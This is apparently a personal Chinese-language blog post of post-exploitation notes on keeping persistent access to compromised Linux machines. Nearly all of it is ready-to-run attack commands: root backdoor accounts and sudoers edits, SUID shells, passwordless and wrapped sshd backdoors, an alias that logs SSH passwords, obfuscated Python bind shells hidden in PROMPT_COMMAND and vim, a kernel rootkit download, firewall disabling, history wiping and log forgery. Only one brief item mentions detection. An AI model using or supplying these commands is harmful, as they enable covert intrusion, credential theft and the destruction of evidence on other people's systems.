后渗透-Linux权限维持

  • by

渗透做到最后几步,缺少这一步,遗留的问题

记录几个易操作和实验成功的类型,更多需要个人进行测试

本来打算进行详细分类,待以后吧,都是一些目前个人已经看到的知识

参考:

https://mp.weixin.qq.com/s?__biz=MzA3NzE2MjgwMg==&mid=2448904250&idx=1&sn=cce745079e51ab4bb013de00c2125bf0&chksm=8b55c067bc22497125d4bd5f7a03e46c214d5db11e5bbdbb8422c92cbcf85e3653def6bab6c5&mpshare=1&scene=23&srcid=&sharer_sharetime=1567397242145&sharer_shareid=ce9dd1505a0c20186b16b8cc4284240c#rd
https://www.cnblogs.com/17bdw/p/10564902.html nb的总结
https://www.freebuf.com/column/162604.html  警惕利用Linux预加载型恶意动态链接库的后门
https://xz.aliyun.com/t/4869  Linux权限维持之影子SUID的利用
----
https://zhuanlan.zhihu.com/p/61215234
 https://www.secpulse.com/archives/59674.html
 https://www.anquanke.com/post/id/155943
 https://evilanne.github.io/2017/08/26/Linux后门-持续关注/
 https://phyb0x.github.io/2018/10/23/linux权限维持-后门/
 https://www.bbsmax.com/A/E35pQE0Adv/
 https://www.cnblogs.com/heycomputer/articles/10666579.html
 https://www.freebuf.com/articles/system/171580.html

记录:

一.添加用户密码
echo "mx7krshell:x:0:0::/:/bin/sh" >> /etc/passwd
echo "mx7krshell::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
useradd seradd -u 0 -o -g root -G roo1
echo "123456" | passwd --stdin roo1 #有些环境中并不能成功
echo "roo1:password" |chpasswd
echo "123456n123456" |(sudo passwd roo1)
useradd -u 0 -o -g root -G root user2 |echo -e "1qaz2wsxn1qaz2wsx"|passwd user1

1、useradd guest;echo 'guest:123456'|chpasswd
2、useradd -p `openssl passwd 123456` guest
3、useradd -p "$(openssl passwd 123456)" guest
4、useradd newuwer;echo -e "123456n123456n" |passwd newuser

echo "guest:x:0:0::/:/bin/sh" >> /etc/passwd
echo 'guest:123456'|chpasswd



二.隐藏文件和文件夹
touch .webshell.php 创建名字为 .webshell.php 的文件
mkdir .backdoor/ 创建名字为 .backdoor 的文件夹
touch ... 创建名字为 ... 的文件
mkdir ... 创建名字为 ... 的文件夹

三.添加 UID 为 0 的用户
useradd -o -u 0 backdoor



四.修改文件时间戳
touch -t



五.SUID shell

Ø Nmap
Ø Vim
Ø find
Ø Bash
Ø More
Ø Less
Ø Nano
Ø cp

find / -perm 4000 -ls
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

cp /bin/bash /.woot
chmod 4755 /.woot chmod u+s /.woot
su bee
/.woot
id
/.woot -p
id



六.远程后门 inetd 未成功

https://www.cnblogs.com/milantgh/p/3601812.html
https://blog.csdn.net/d_0xff/article/details/51521075
https://blog.csdn.net/cmh477660693/article/details/52759750 ubuntu关闭和开启防火墙

可以修改/etc/services文件,加入以下的东西:
woot 6666/tcp #evil backdoor service

ufw disable
ufw enable
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F


七.快速获得ssh后门
sshd快速后门
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337
执行完之后,任何一台机器ssh root@IP -p 31337不需要密码


八.SSH wrapper后门

cd /usr/sbin/
mv sshd ../bin/
echo '#!/usr/bin/perl' >sshd
echo 'exec "/bin/sh" if(getpeername(STDIN) =~ /^..4A/);' >>sshd
echo 'exec{"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd
chmod u+x sshd
/etc/init.d/sshd restart

socat STDIO TCP4:target_ip:22,sourceport=13377
socat STDIOTCP4:target_ip:22,sourceport=19526


九.mafix rootkit创建后门

十.Crontab后门

十一.ssh 公钥免密 可以测试
https://www.jianshu.com/p/6761199bedba

十二.alias 后门
当前用户目录下.bashrc
alias ssh='strace -o /tmp/sshpwd-`date '+%d%h%m%s'`.log -e read,write,connect -s2048 ssh'

十三.利用系统服务程序

十四.TCP/UDP/ICMP Shell
https://github.com/inquisb/icmpsh/blob/master/icmpsh_m.py

十五.共享库文件

十六.可装载内核模块(LKM)
wget http://core.ipsecs.com/rootkit/kernel-rootkit/ipsecs-kbeast-v1.tar.gz
著名的LKM包有adore和knark


十七.PROMPT_COMMAND后门
export PROMPT_COMMAND="lsof -i:1025 &>/dev/null || (python -c "exec('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode('base64'))" 2>/dev/null &)"
python -c "exec('aW1wb3J0IHNvY2tldCxvcyxzeXMKcz1zb2NrZXQuc29ja2V0KCkKcy5iaW5kKCgiIiwxMDI1KSkKcy5saXN0ZW4oMSkKKGMsYSk9cy5hY2NlcHQoKQp3aGlsZSAxOgogZD1jLnJlY3YoNTEyKQogaWYgJ2V4aXQnIGluIGQ6CiAgcy5jbG9zZSgpCiAgc3lzLmV4aXQoMCkKIHI9b3MucG9wZW4oZCkucmVhZCgpCiBjLnNlbmQocikK'.decode('base64'))" 2>/dev/null &
nc 192.168.1.174 1025

十八.PROMPT_COMMAND提权
export PROMPT_COMMAND="/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hacker:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND"

十九.Sudoers "trick"
sudo su -c "echo 'mx7krshell ALL = NOPASSWD: ALL' >> /etc/sudoers.d/README"
useradd test
passwd test
sudo su -c "echo 'test ALL=(ALL) ALL' >> /etc/sudoers"
参考:https://zhidao.baidu.com/question/1051203987262249219.html

二十.TCP Wrappers

二十一.nmap nse后门

二十二.进程注入 cymothoa进程注入后门


二十三.清理history
export HISTSIZE=0
export HISTFILE=/dev/null


二十四.修改上传文件时间戳
touch -r 老文件时间戳 新文件时间戳
touch -t

二十五.伪造Apache日志中的指定IP
sed –i ‘s/192.168.1.3/192.168.1.4/g’ /var/log/apache/ access.log
sed –i ‘s/192.168.1.3/192.168.1.4/g’ /var/log/apache/error_log

二十六.Linux日志清除(很有意思的)
sed –i 's/192.168.1.3/192.168.1.4/g' /var/log/apache/ access.log
sed –i 's/192.168.1.3/192.168.1.4/g' /var/log/apache/error_log
清理脚本:https://github.com/JonGates/jon


二十七.收集后门
https://github.com/iamckn/backdoors

二十八.PAM后门
搭建PAM后门主要思路:pam_unix_auth.c打补丁安装到正常的PAM模块中

二十九.后门的检测
使用Tripwire或md5校验来检查系统


三十.预加载型动态链接库后门
#默认无输出,如果有输出就需要去看下文件是否为异常文件了
unset LD_PRELOAD
#使用命令unset LD_PRELOAD即可卸载使用LD_PRELOAD环境变量安装的恶意动态链接库


三十一.DNS后门

三十二.vim后门
cd /usr/lib/python2.7/site-packages && $(nohup vim -E -c “pyfile dir.py”> /dev/null 2>&1 &) && sleep 2 && rm -f dir.py

dir.py文件:

#from https://www.leavesongs.com/PYTHON/python-shell-backdoor.html
from socket import *
import subprocess
import os, threading, sys, time
if __name__ == "__main__":
server=socket(AF_INET,SOCK_STREAM)
server.bind(('0.0.0.0',11))
server.listen(5)
print 'waiting for connect'
talk, addr = server.accept()
print 'connect from',addr
proc = subprocess.Popen(["/bin/sh","-i"], stdin=talk,
stdout=talk, stderr=talk, shell=True)

nc ip 11是能拿到shell的

三十三.so注入
https://github.com/gaffe23/linux-inject/





2019.9.22

发表评论

电子邮件地址不会被公开。 必填项已用*标注